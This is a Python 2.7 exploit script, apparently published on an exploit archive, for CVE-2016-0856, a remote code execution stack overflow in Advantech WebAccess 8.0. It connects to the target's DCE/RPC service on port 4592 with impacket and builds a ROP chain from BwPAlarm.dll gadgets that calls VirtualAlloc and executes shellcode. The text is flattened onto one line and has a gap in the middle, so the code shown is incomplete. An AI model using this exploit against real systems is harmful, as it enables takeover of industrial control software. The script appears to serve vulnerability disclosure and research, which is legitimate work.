#!/usr/bin/python2.7 # Exploit Title: Advantech WebAccess < 8.1 webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow RCE # Date: 03-29-2018 # Exploit Author: Chris Lyne (@lynerc) # Vendor Homepage: www.advantech.com # Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe # Version: Advantech WebAccess 8.0-2015.08.16 # Tested on: Windows Server 2008 R2 Enterprise 64-bit # CVE : CVE-2016-0856 # See Also: https://www.zerodayinitiative.com/advisories/ZDI-16-093/ import sys, struct from impacket import uuid from impacket.dcerpc.v5 import transport def call(dce, opcode, stubdata): dce.call(opcode, stubdata) res = -1 try: res = dce.recv() except Exception, e: print "Exception encountered..." + str(e) sys.exit(1) return res if len(sys.argv) != 2: print "Provide only host arg" sys.exit(1) port = 4592 interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc" version = "1.0" host = sys.argv[1] string_binding = "ncacn_ip_tcp:%s" % host trans = transport.DCERPCTransportFactory(string_binding) trans.set_dport(port) dce = trans.get_dce_rpc() dce.connect() print "Binding..." iid = uuid.uuidtup_to_bin((interface, version)) dce.bind(iid) print "...1" stubdata = struct.pack(" PTR to VirtualAlloc 0xFFFFFFFF # ebx = -1 ] for i in range(0, len(shellcode)+1): rop_gadgets.append(0x0703e116) # INC EBX # MOV AX,10 # RETN ** [BwPAlarm.dll] # ebx = size of shellcode rop_gadgets += [ 0x070441d1, # POP EBP # RETN [BwPAlarm.dll] 0x0703fe39, # POINTER INC ECX # PUSH ESP # RETN ** [BwPAlarm.dll] ** # ebp -> Return to ESP 0x0705ddfd, # POP EAX # RETN [BwPAlarm.dll] ------ Modified by me 0x90909090, # nop # eax = 0x90909090 0x07010f5c # PUSHAD # RETN [BwPAlarm.dll] ] return ''.join(struct.pack('